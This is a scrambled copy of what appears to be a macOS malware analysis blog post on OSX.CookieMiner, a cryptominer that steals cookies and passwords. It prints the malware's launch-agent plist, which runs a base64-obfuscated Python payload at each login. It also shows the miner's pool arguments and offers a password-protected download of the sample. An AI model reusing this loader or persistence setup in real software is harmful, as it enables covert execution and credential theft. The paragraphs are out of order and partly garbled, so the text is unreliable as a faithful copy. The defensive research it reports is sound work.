If successful, the attackers would have full access to the victim's exchange account and/or wallet and be able to use those funds as if they were the user themselves._" -Unit 42 "_By leveraging the combination of stolen login credentials, web cookies, and SMS data, based on past attacks like this, we believe the bad actors could bypass multi-factor authentication for these sites. The cookie, password, and message stealing capabilities are (likely) implemented to allow attackers to bypass 2FA protections on victims online cryptocurrency accounts: The most interesting aspect of CookieMiner (and what differentiates it from OSX.DarthMiner) is its propensity for stealing! During their comprehensive analysis Unit 42 researchers highlighted the fact that CookieMiner captures and exfiltrates the following: The persistently installed Empyre backdoor allows remote attacks to run arbitrary commands on an infected host.īy examining the arguments passed to the persistent miner binary, xmrig2 it appears to be mining the Koto cryptocurrency:ġ ProgramArguments 2 3 /Users/Shared/xmrig2 4 -a 5 yescrypt 6 -o 7 stratum+tcp://koto-pool.work:3032 8 -u 9 k1GqvkK7QYEfMj3JPHieBo1m. In our “The Mac Malware of 2018” report we noted that DarthMiner, persists the well known Empyre backdoor (via the file) and a cryptocurrency mining binary named XMRig (via ).ĬookieMiner does this as well (though a 2 has been added to both the mining binary and plist): This is not a coincidence, as (was noted in the Unit 42 report): “ has been developed from OSX.DarthMiner, a malware known to target the Mac platform”Ĭapabilities: Cryptomining, Cookie/Password Stealing, BackdoorĬookieMiner is likely the evolution of OSX.DarthMiner. (We also covered OSX.DarthMiner in our “The Mac Malware of 2018” report). This is performed during the first stage of the infection, via a shell script named `uploadminer.sh`:ġ 2 3 4 5 Label 6 7 ProgramArguments 8 9 python 10 -c 11 import sys,base64,warnings warnings.filterwarnings('ignore') exec(base64.b64decode(ġ2 'aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbmlġ4 hcileU1soU1tpXStTW2pdKSUyNTZdKSkKZXhlYygnJy5qb2luKG91dCkp')) Īs the RunAtLoad key is set to true in this property list as well, the python commands will be automatically (re)executed each time the user logs in.ĭoes this look familiar? Yes! In fact this is exactly how OSX.DarthMiner persisted. …as such, CookieMiner’s infection vector remains unknown.Īs noted in Unit 42's (), `CookieMiner` persists two launch agents. "(), deputy director of Threat Intelligence for Unit 42, told Threatpost that researchers are not certain how victims are first infected by the shell script, but they suspect victims download a malicious program from a third-party store." However, a ThreatPost writeup states that: Unit 42 (of Palo Alto Networks) who uncovered CookieMiner and wrote the original report on the malware, made no mention the malware’s initial infection vector. “Mac ‘CookieMiner’ Malware Aims to Gobble Crypto Funds”.“Mac Malware Steals Cryptocurrency Exchanges’ Cookies”.“How to Reverse Malware on macOS Without Getting Infected”ĬookieMiner is a cryptominer that also steals user cookies and passwords, likely to give attackers access to victims online accounts and wallets.ĭownload: OSX.CookieMiner (password: infect3d) “Lets Play Doctor: Practical OSX Malware Detection & Analysis” If you’re interested in general Mac malware analysis techniques, check out the following resources: Installed (to /usr/bin/lldb) as part of Xcode.Ī “reverse engineering tool (for macOS) that lets you disassemble, decompile and debug your applications” …or malware specimens! The de-facto commandline debugger for macOS.
Our ( open-source) utility that displays code-signing information, via the UI. Our user-mode ( open-source) utility monitors file events (such as creation, modifications, and deletions) providing detailed information about such events. Our user-mode ( open-source) utility that monitors process creations and terminations, providing detailed information about such events. Throughout this blog, we’ll reference various tools used in analyzing the malware specimens. The “ malwareland” channel on the MacAdmins slack / / / and others who choose to remain unnamed. I’d personally like to thank the following organizations, groups, and researchers for their work, analysis, & assistance! 🙏🏻
0 kommentar(er)
